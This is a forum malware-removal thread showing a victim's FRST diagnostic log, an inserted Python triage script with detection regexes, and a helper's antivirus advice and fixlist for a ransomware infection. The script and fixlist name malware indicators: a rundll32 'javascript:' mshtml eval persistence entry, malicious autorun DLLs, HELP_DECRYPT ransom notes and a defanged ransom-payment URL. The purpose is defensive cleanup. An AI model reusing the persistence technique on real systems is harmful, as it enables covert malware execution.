   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
 
System errors:
=============
Error: (02/21/2015 10:42:55 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:42:13 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:40:13 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:39:30 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:38:47 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:36:54 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:36:07 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:35:25 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:34:38 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:32:39 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
 
Microsoft Office Sessions:
=========================
Error: (02/21/2015 10:40:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.3.9600.1638452158733unknown0.0.0.000000000c0000005033c92b813f401d04e59b4ea3f5eC:\WINDOWS\syswow64\windowspowershell\v1.0\powershell.exeunknownf8b04196-ba4c-11e4-bef0-089e013a632b
 
Error: (02/21/2015 10:40:48 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
 
Error: (02/21/2015 10:40:35 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.3.9600.1638452158733unknown0.0.0.000000000c0000005033878b0f0c01d04e59ad2f98abC:\WINDOWS\syswow64\windowspowershell\v1.0\powershell.exeunknownf0be6a1c-ba4c-11e4-bef0-089e013a632b
 
Error: (02/21/2015 10:40:35 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
 
Error: (02/21/2015 10:40:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.3.9600.1638452158733unknown0.0.0.000000000c0000005039292b86e001d04e59a6e1c57dC:\WINDOWS\syswow64\windowspowershell\v1.0\powershell.exeunknownea3b534c-ba4c-11e4-bef0-089e013a632b
 
Error: (02/21/2015 10:40:24 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
 
Error: (02/21/2015 10:38:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.3.9600.1638452158733unknown0.0.0.000000000c000000503048ce8137801d04e5950fbbed4C:\WINDOWS\syswow64\windowspowershell\v1.0\powershell.exeunknown94e77365-ba4c-11e4-bef0-089e013a632b
 
Error: (02/21/2015 10:38:00 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
 
Error: (02/21/2015 10:37:50 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.3.9600.1638452158733unknown0.0.0.000000000c0000005035092a0f3c01d04e594b4c4144C:\WINDOWS\syswow64\windowspowershell\v1.0\powershell.exeunknown8e33772d-ba4c-11e4-bef0-089e013a632b
 
Error: (02/21/2015 10:37:50 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
 
==================== Memory info =========================== 
 
Processor: AMD E1-1200 APU with Radeon™ HD Graphics
Percentage of memory in use: 33%
Total physical RAM: 3660.08 MB
Available physical RAM: 2427.64 MB
Total Pagefile: 4060.08 MB
Available Pagefile: 2657.52 MB
Total Virtual: 131072 MB
Available Virtual: 131071.8 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:444.06 GB) (Free:382.85 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive d: (Recovery Image) (Fixed) (Total:19.78 GB) (Free:2.47 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive f: () (Removable) (Total:7.44 GB) (Free:6.38 GB) FAT32
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: D370BA94)
 
Partition: GPT Partition Type.
 
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 7.5 GB) (Disk ID: 00000000)
 
Partition: GPT Partition Type.
 
==================== End Of Log ============================

 


  • 0
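Added example (not part of any member's post and not FRST's own code): Python that tags FRST log lines showing the patterns this thread deals with, namely scheduled tasks and autoruns that launch from AppData or Temp, a `rundll32 javascript:` registry entry, and ransom-note files. The sample lines, user name, GUIDs and file names are constructed placeholders; the tag names and the choice of AppData/Temp as "user-writable" are assumptions of this example.

```python
import re
from collections import Counter

# Constructed sample lines shaped like FRST output. The user name, GUIDs,
# folder names and file names are placeholders, not values from a real machine.
SAMPLE_LOG = r"""
Task: {11111111-1111-1111-1111-111111111111} - System32\Tasks\Security Center Update - 1000000001 => C:\Users\ExampleUser\AppData\Roaming\Aaaaaa\bbbbbb.exe
Task: {22222222-2222-2222-2222-222222222222} - System32\Tasks\Security Center Update - 1000000002 => C:\Users\ExampleUser\AppData\Roaming\Cccccc\dddddd.exe
Task: {33333333-3333-3333-3333-333333333333} - System32\Tasks\ExampleVendor Updater => C:\Program Files\ExampleVendor\updater.exe
HKU\S-1-5-21-0-0-0-1001\...\Run: [example] => rundll32 "C:\Users\ExampleUser\AppData\Local\example.dll",example
CustomCLSID: HKU\S-1-5-21-0-0-0-1001_Classes\CLSID\{44444444-4444-4444-4444-444444444444}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("<encoded script>")
2015-01-01 10:00 - 2015-01-01 10:00 - 00008630 _____ () C:\Users\ExampleUser\Desktop\HELP_DECRYPT.HTML
2015-01-01 10:00 - 2015-01-01 10:00 - 00004214 _____ () C:\Users\ExampleUser\AppData\Local\DECRYPT_INSTRUCTION.TXT
2015-01-01 09:00 - 2015-01-01 09:00 - 00001024 _____ () C:\Users\ExampleUser\Documents\notes.txt
"""

# Locations a standard user can write to (assumption of this example).
USER_WRITABLE = re.compile(r"\\(AppData|Temp)\\", re.I)
# "Task: {GUID} - System32\Tasks\<name> => <target>"
TASK = re.compile(
    r"^Task: \{[0-9A-Fa-f-]+\} - System32\\Tasks\\(?P<name>.+?) => (?P<target>.+)$"
)
# Run / RunOnce values and Winlogon Notify packages.
AUTORUN = re.compile(r"\\(Run|RunOnce): \[|^Winlogon\\Notify\\", re.I)
# Registry data that makes rundll32 evaluate script through mshtml.
SCRIPT_IN_REGISTRY = re.compile(
    r"rundll32(\.exe)?\s+javascript:.*mshtml.*RunHTMLApplication", re.I
)
# Ransom-note file names seen in this thread.
RANSOM_NOTE = re.compile(
    r"\\(HELP_DECRYPT|DECRYPT_INSTRUCTION)\.(HTML|TXT|PNG|URL)\b", re.I
)


def classify(line):
    """Return the set of finding tags for one log line (empty set = no hit)."""
    tags = set()
    task = TASK.match(line)
    if task and USER_WRITABLE.search(task.group("target")):
        tags.add("task-from-user-writable-path")
    if AUTORUN.search(line) and USER_WRITABLE.search(line):
        tags.add("autorun-from-user-writable-path")
    if SCRIPT_IN_REGISTRY.search(line):
        tags.add("script-in-registry")
    if RANSOM_NOTE.search(line):
        tags.add("ransom-note-file")
    return tags


def task_clusters(lines, minimum=2):
    """Group task names that differ only in a trailing number.

    Tasks created in bulk from one naming template collapse into a single
    cluster, which is easier to spot than dozens of individual lines.
    """
    counts = Counter()
    for line in lines:
        task = TASK.match(line)
        if task:
            base = re.sub(r"\s*-?\s*\d+$", "", task.group("name"))
            counts[base] += 1
    return {name: n for name, n in counts.items() if n >= minimum}


def triage(text):
    """Return (findings, clusters) for a block of log text."""
    lines = [raw.strip() for raw in text.splitlines() if raw.strip()]
    findings = []
    for line in lines:
        tags = classify(line)
        if tags:
            findings.append((tags, line))
    return findings, task_clusters(lines)


if __name__ == "__main__":
    hits, clusters = triage(SAMPLE_LOG)
    for tags, line in hits:
        print(", ".join(sorted(tags)), "|", line[:90])
    for name, count in clusters.items():
        print("cluster:", name, "x", count)
```

The tags only prioritise lines for a human reviewer; legitimate software also runs from AppData, so a hit is a prompt to look at the entry, not a verdict.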

#4
allforhimblog


    Member

  • Topic Starter
  • Member
  • 98 posts

I hit the submit button twice, sorry about that, cleared that extra text out


Edited by allforhimblog, 21 February 2015 - 11:07 PM.

  • 0

#5
dbreeze


    Trusted Helper

  • Malware Removal
  • 2,213 posts
First Cleanup Step >>>>

==> Multiple Antivirus Programs Installed <==

In checking the logs you have posted, it seems you have multiple antivirus programs installed on your system. From the logs it looks like the following is on your system:
  • Norton Internet Security - from the data in the logs, this is a disabled but up to date version of a paid product
  • Avast Free Antivirus - this program seems to be loading also at system start up
Why is this BAD?
This is not an advisable situation for several reasons: slowdown of your system because of the drain of resources for the additional scanners, conflicts of the real-time scanners to access the same object for scanning, and multiple exceptions that have to be made for the various scanners to even try to function on the same system. The end result is that this is a case of "more actually equals less"; you are less protected with multiple Antivirus programs (those with real-time scanning always enabled) than just a single Antivirus program.

What to do now
First, check to see if any of the paid products are still current / not expired.

Next, decide on which program stays and which programs to uninstall.

IF any of the paid antivirus software is NOT expired, you are safe to choose one of those. Non-expired subscriptions will still get current AV definitions and have the scanning functions active; expired subscriptions do not get current definitions and the scanners are de-activated, so you are unprotected with expired subscriptions.

IF all of the paid subscription software is expired, a Free software solution is preferred to none at all (expired subscription software is the same (at best) as none at all; you are not protected with an expired subscription for a paid antivirus software). We recommend a FREE solution (Avast! free) because we want users to be protected; the FREE version doesn't have a subscription that expires (and leaves the user un-protected), uses less resources on the user's system (it doesn't include all the extras that the paid versions of Avast do) but still offers a good level of protection from virus and malware.

How do I get back to being protected?
Basically, you should uninstall one of the two programs and use any cleanup uninstall utility program those vendors provide to make sure there are no left-over remains (registry entries, files, drivers, etc.) on your system. This will remove any possible interference of the two uninstalled programs to the security program that remains. Because some of the cleanup utilities ask you to run them in Safe Mode (which does not have network access) you should download them first before starting the uninstalling processes.

Step 1 - Download the Uninstall / clean up utilities (save the file(s) on your desktop): You only need to download the utility for the programs you want to uninstall; I listed all three here for your convenience.



Step 2 - Uninstall the programs you don't want to keep - using the standard uninstall process followed by the uninstall utility

When you have finished with the removal steps (removing one of the two antivirus programs and running their cleaning utilities), please restart your system.


Second Cleanup Step >>>>

Run a FRST Fixlist script

Open notepad. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy. Paste this into the open notepad. Save it to your desktop as fixlist.txt



start
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [CrashReportSaver] => C:\WINDOWS\Installer\{4E61FB7C-E89A-4510-ADC1-B38572ADB03D}\msiexec.exe [1464320 2015-02-20] (EFD Software)
Winlogon\Notify\pckunie-x32: C:\Users\Dorothy01\AppData\Local\pckunie.dll ()
Winlogon\Notify\pgkunge-x32: C:\Users\Dorothy01\AppData\Local\pgkunge.dll ()
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\Run: [acikmao] => rundll32 "C:\Users\Dorothy01\AppData\Local\acikmao.dll",acikmao <===== ATTENTION
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\Run: [dccwmote] => C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe [406016 2015-02-21] () <===== ATTENTION
C:\Users\Dorothy01\AppData\Local\acikmao.dll
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\MountPoints2: {5042c0a6-b247-11e4-bed4-089e013a632b} - "G:\AutoRun.exe"
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML ()
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG ()
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT ()
InternetURL: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL -> hxxp://paytoc4gtpn5czl2.torconnectpaycom/1msme5i
SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.co...54371-11896-2/4 ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: No Name -> {7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} -> No File
BHO: No Name -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> No File
BHO-x32: No Name -> {7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} -> No File
Toolbar: HKLM - No Name - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - No File
Toolbar: HKU\.DEFAULT -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Tcpip\..\Interfaces\{0C5C3F02-879E-42E8-8113-9C0FA649DB90}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{462105B1-AF78-47E3-AC0D-109F28027A93}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{9B004C7D-7A34-4A9C-BEDB-5212A582FAB1}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{D24FA36B-6CD5-4603-8F72-73AC28D99F5B}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\HELP_DECRYPT.URL
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.URL
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.URL
2015-02-19 21:10 - 2015-02-21 03:14 - 00000292 _____ () C:\HELP_DECRYPT.URL
2015-02-19 21:07 - 2015-02-19 21:07 - 00023552 _____ () C:\Users\Dorothy01\AppData\Local\pckunie.dll
2015-02-19 23:28 - 2014-11-14 15:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Adhoxi
2015-02-19 23:28 - 2014-07-23 15:49 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\unpacked23206
2015-02-19 22:45 - 2014-11-26 18:24 - 00000000 ____D () C:\ProgramData\bamgaq
